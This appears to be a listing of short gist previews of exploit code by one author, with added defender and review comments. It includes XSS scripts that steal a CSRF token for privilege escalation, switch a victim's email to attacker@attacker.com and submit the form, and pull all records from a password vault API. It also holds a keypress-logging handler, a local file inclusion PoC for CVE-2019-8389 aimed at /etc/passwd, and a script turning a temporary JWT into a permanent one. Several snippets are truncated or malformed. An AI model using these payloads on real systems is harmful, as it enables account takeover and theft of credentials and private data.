View XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation | |
// Author: Shawar Khan | |
// What the visible lines do: request the settings page with the browser's
// cookies attached (credentials: 'include') and read the response as HTML text.
// Defender note: a script running inside the site's own origin can read any
// anti-CSRF token embedded in a page, so CSRF tokens give no protection once
// XSS exists. Fix the injection point (contextual output encoding), deploy a
// strict Content-Security-Policy, and require re-authentication for role or
// privilege changes.
var woot = document.createElement('html'); | |
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){ | |
// Parse the response inside a detached element (it is never attached to the
// document in the lines shown) so it can be queried like a DOM tree.
woot.innerHTML=data; | |
// The token is taken from the fourth <meta> element by position (index 3),
// so this depends on the exact markup of that page.
var csrf_token = woot.getElementsByTagName('meta')[3]['content']; | |
// privilege_escalate() is defined outside the lines shown in this preview.
privilege_escalate(); |
View exptest.js
// Page-wide keypress handler that appends every typed character to `keys`.
// Defender note: any script that runs in a page, including an injected or
// third-party one, can register a handler like this. A strict
// Content-Security-Policy (script-src with nonces or hashes, plus connect-src /
// img-src / form-action limits) and Subresource Integrity on external scripts
// reduce both the chance of such code running and where it could send data.
// The timer started after this block is cut off in this listing, so what is
// done with the collected string is not visible here.
var keys = ''; | |
document.onkeypress = function(e) { | |
// Legacy IE exposed the event as window.event instead of passing it in.
var get = window.event ? event : e; | |
// keyCode / charCode are deprecated event properties; either one is accepted.
var key = get.keyCode ? get.keyCode : get.charCode; | |
key = String.fromCharCode(key); | |
// NOTE(review): the trailing `----` is not valid JavaScript as shown; it looks
// like residue from the page extraction and is left untouched.
keys += key;---- | |
} | |
window.setInterval(function(){ |
View Musicloud-exploit.py
#!/usr/bin/python | |
# Proof of concept for CVE-2019-8389 | |
# Exploit author: Shawar Khan | |
import sys | |
import requests | |
# Prints the expected command line; going by the example in the message, the
# arguments are a target host followed by a file path.
# NOTE(review): `print "..."` is a Python 2 statement and does not parse on
# Python 3. The rest of the script is not shown in this preview.
def usage(): | |
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n" |
View token.py
# Sample code that obtains a permanent JWT when given a temporary one | |
import json | |
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
# Silences urllib3's InsecureRequestWarning, which is emitted for HTTPS requests
# made without certificate verification. The request call itself is outside the
# lines shown; presumably it is sent with verification disabled (TODO confirm).
# With verification off, the bearer token below can be sent to an endpoint whose
# identity was never checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
# raw_input() exists only in Python 2. The value read here is a live credential:
# avoid echoing or logging it.
jwt_token=raw_input("Enter token > ") | |
# Defender note: per the file's header comment this endpoint exchanges a
# temporary token for a permanent one. If a bearer token alone is enough for
# that, a leaked short-lived token becomes a long-lived credential; such an
# exchange should require fresh authentication and the issued token should be
# revocable.
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
# The token is placed in the authorization header as a Bearer credential.
# NOTE(review): "Connection": "clos" looks like a typo for "close"; left as is.
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
View alert.js
// Shows a dialog containing 1337. In XSS testing a call like this serves as a
// harmless marker that script executed in the page; it has no other effect.
alert(1337) |
View email_change_exploit_xss.js
// a Simple XSS exploit for email change | |
// Shawar Khan | |
// Opens the settings page in a new window and, once it has loaded, edits and
// submits its first form from script. Reading dark_window.document is only
// permitted when the opener runs in the same origin as the opened page, so the
// code depends on script already executing inside that site.
// Defender note: require the current password, or confirmation through the
// existing address, before an email change takes effect, and notify the old
// address. A single scripted form submit then cannot complete an account
// takeover.
var dark_window = window.open('https://www.target.com/settings'); | |
dark_window.addEventListener('load', | |
function exploit_run(){ | |
// [0][2] and [0][40] select controls of the first form by position, so they
// are tied to the exact markup of that page.
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email | |
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
View password_vault_exploit.js
//Exploit Code by Shawar Khan | |
// Accumulator string; how it is used lies outside the lines shown here.
var data_chunks = ''; | |
// Requests the full records list from the API and reads the body as text.
// fetch() sends cookies on same-origin requests by default, so if this runs
// inside the application's own origin the response is the signed-in user's data
// (presumably the case here; the host is redacted).
// Defender note: bulk-read endpoints for vault data are a high-value target for
// injected script. A strict Content-Security-Policy (script-src, connect-src)
// and a re-authentication step before sensitive records are returned limit what
// an XSS can reach.
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the response body as a string
var allrecords = data; | |
// Converting the response to JSON (the conversion itself is cut off in this preview)